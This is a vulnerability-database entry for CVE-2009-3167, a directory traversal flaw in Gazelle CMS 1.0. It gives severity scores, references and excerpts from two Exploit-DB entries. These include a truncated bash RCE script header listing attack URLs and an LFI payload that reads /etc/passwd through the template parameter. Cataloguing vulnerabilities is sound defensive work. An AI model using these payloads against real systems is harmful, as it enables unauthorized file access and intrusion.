CVE-2009-3167
Published 2009-09-11
Priority: P4 | 29 | medium | 4.3 CVSS 2.0
CVSS vector: AV:N/AC:M/Au:N/C:P/I:N/A:N
EXPLOIT
EPSS: 2.35% (81.6th percentile)
Directory traversal vulnerability in index.php in Anantasoft Gazelle CMS 1.0, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the template parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| anantasoft | gazelle_cms | — | — |
No detection rules found.
Exploit-DB
Gazelle CMS 1.0 - Multiple Vulnerabilities / Remote Code Execution
exploitdb·2009-08-12
CVE-2009-3182 Gazelle CMS 1.0 - Multiple Vulnerabilities / Remote Code Execution
---
#!/bin/bash
# Gazelle CMS 1.0 Multiple Vulnerabilities
# Script Download: http://www.anantasoft.com/index.php?Gazelle%20CMS/Download
# Found by white_sheep on 11/08/2009
# Contact: [email protected] - https://www.ihteam.net
# Need magic_quote_gpc Off for RCE and LFI
# Thanks to r00t
#
# PASSWORD RESET:
# http://localhost/gazelle/renew.php?user=[username]
#
# LFI:
# author: fuzion (milw0rm.com/author/1343)
# http://localhost/gazelle/index.php?template=[LFI]
#
# XSS:
# http://localhost/gazelle/user.php?user=[XSS]
# http://localhost/gazelle/search.php?lookup=[CODE]
#
# RCE:
echo
echo "###############################################"
echo "# GazelleCMS 1.0 RCE #"
echo "# by white_sheep #"
echo "# sheewhite[at]googl
Exploit-DB
Gazelle CMS 1.0 - 'template' Local File Inclusion
exploitdb·2009-01-28
CVE-2009-3167 Gazelle CMS 1.0 - 'template' Local File Inclusion
---
Gazelle CMS Local File Inclusion
http://www.anantasoft.com/
/gazelle/?template=../../../../../../../../../../../../etc/passwd%00 (view source)
Author notified: Jan 20
http://nukeit.org
# milw0rm.com [2009-01-28]
No writeups or analysis indexed.
http://secunia.com/advisories/33686
http://www.exploit-db.com/exploits/7895
http://www.exploit-db.com/exploits/9425
http://www.securityfocus.com/bid/33483